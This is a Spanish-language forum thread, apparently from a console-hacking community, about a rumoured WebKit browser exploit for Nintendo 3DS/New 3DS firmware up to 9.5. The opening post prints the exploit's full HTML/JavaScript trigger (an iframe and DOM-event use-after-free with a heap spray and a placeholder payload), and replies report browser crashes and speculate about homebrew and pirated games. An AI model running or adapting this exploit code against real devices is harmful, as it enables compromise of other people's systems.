[Rumor] Posible exploit 9.5 ?

Too bad that they take too long to figure out how make their Payload working.
This is a working Webkit Exploit for N3DS/3DS/etc.. up to 9.5.
I make it more simple, actually iframe display none help ;)
It also work on Wii U up to 5.3.2 by using User Agent Nintendo 3DS
Now hopefully devs or this shit team called Gateway 3DS will figure out how their own payload work.
Special message to MathewE, do you really think that you are the only one who can work with this ?
I know how you false bug work, including Miiplaza and co, you are late on the party.


FUENTE OFICIAL

Hilo en GBA Temp

Código que supuestamente puede utilizarse para un exploit en 9.5.
<html>
<head>
<style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;}
       
</style>
<script>
    if(parent==window) {
        window.onload = function() {
            document.body.innerHTML += "<iframe src='#' />";     
};
    } else if(navigator.userAgent.indexOf('Nintendo 3DS') != -1) {
        var nb = 0;
        window.onload = function () {
            f = window.frameElement;
            p = f.parentNode;
            var o = document.createElement("object");
            o.addEventListener('beforeload', function () {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }, false);
            document.body.appendChild(o);
        };
    }
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));

        mem.push(t);
    }

    function dsm(e) {
        var mem = [];
        for (var j = 20; j < 430; j++)
           magicfun(mem, j, unescape("payload"));
           
    }

</script>
</head>
<body>
</body>
</html>



Vídeo corriendo el exploit provocando overflow

Puede que sea un fake. ¿Que os parece?
Me parece que si funciona y consiguen rular el exploit del Cubic Ninja o algo estaré muy contento x)
Lo del video ese... parece que funciona pero no XD, eso es lo que pasa en 3DS cuando algo va mal y no funca XD
Hola he provado el exploit en mi O3DS (Emunand 9.4) y puedo asegurar de que la 3DS se queda totalmente congelada lo he subido a una web creada por mi
www.josiko12.hostingla.in

y el QR:
Imagen
Sys a 9.5.0-22 y me crashea wl navegador, no actualicé al 9.5.0-23, aparentemente no ocurre nada raro solo eso, crashea navegador xD
En teoria, esto es para New3DS, no para O3DS
CrusardGameamos escribió:En teoria, esto es para New3DS, no para O3DS


En teoría si, pero si lo que hacen es petar la memoria de la consola para que crashee el navegador, supongo que si funciona en New3DS tiene que funcionar en O3DS no? Aunque si funciona las partes de la memoria para ejecutar lo que sea serán distintas de la New seguramente
ferminuno escribió:
CrusardGameamos escribió:En teoria, esto es para New3DS, no para O3DS


En teoría si, pero si lo que hacen es petar la memoria de la consola para que crashee el navegador, supongo que si funciona en New3DS tiene que funcionar en O3DS no? Aunque si funciona las partes de la memoria para ejecutar lo que sea serán distintas de la New seguramente

Acabo de releer el pastebin, y dice que funciona tanto en New3DS como 3DS, pero la verdad es que no me cuadra mucho XD
El problema de este exploit, no esta en como se ejecuta, sino la puerta de entrada que utiliza, es decir, que por ejemplo, GW puede usar este "vehiculo" para acceder al "peaje" que da acceso a GW, solo que en 9.3+ no hay un peaje XD, sino una frontera jaja
Creo que funciona asi XD, hasta que no descubran una forma de romper una ventana no creo que puedan hacer gran cosa con esto, que simplemente se ha saltado la valla XD
CrusardGameamos escribió:
ferminuno escribió:
CrusardGameamos escribió:En teoria, esto es para New3DS, no para O3DS


En teoría si, pero si lo que hacen es petar la memoria de la consola para que crashee el navegador, supongo que si funciona en New3DS tiene que funcionar en O3DS no? Aunque si funciona las partes de la memoria para ejecutar lo que sea serán distintas de la New seguramente

Acabo de releer el pastebin, y dice que funciona tanto en New3DS como 3DS, pero la verdad es que no me cuadra mucho XD
El problema de este exploit, no esta en como se ejecuta, sino la puerta de entrada que utiliza, es decir, que por ejemplo, GW puede usar este "vehiculo" para acceder al "peaje" que da acceso a GW, solo que en 9.3+ no hay un peaje XD, sino una frontera jaja
Creo que funciona asi XD, hasta que no descubran una forma de romper una ventana no creo que puedan hacer gran cosa con esto, que simplemente se ha saltado la valla XD


Como GW no saque algo super innovador, el año que viene va a ser cosa del pasado, me parece a mi.
Entonces que creeis que es un simple error del navegador no explotable o que tiene futuro¿?
0c0de escribió:Entonces que creeis que es un simple error del navegador no explotable o que tiene futuro¿?

Yo veo que es la "Puerta" al olvido del OoT y CN
CrusardGameamos escribió:
0c0de escribió:Entonces que creeis que es un simple error del navegador no explotable o que tiene futuro¿?

Yo veo que es la "Puerta" al olvido del OoT y CN


Lo que se nos viene a la cabeza a todos CIAS (Porque es lo que todos quieren) y Hombrew (En mi opinion se podian esforzar mas si que es verdad que no tiene que ser nada facil programar un homebrew pero leches un reproductor a lo showtime no estaria mal [sonrisa] ) sin ningun juego
Esto es lo mismo que hay ya para O3DS (SpiderHax), sólo que es funcional en O3DS y New3DS me parece a mí... Porque vaya, el error que da la consola es el mismo, y ocurre lo mismo, peta la página y sale del navegador.
Sea lo que sea esto es sólo el punto de entrada, si portan alguna cosa sólo funcionará hasta la 9.2, porque de ahí en adelante parchearon el resto de formas de acceder con permisos de sistema y tal, puede que esto permita seguir haciendo lo que hacen todos los que actualizaron por encima de 9.2, modificar la RAM de la consola para inyectar Pokémons y cosas así
12 respuestas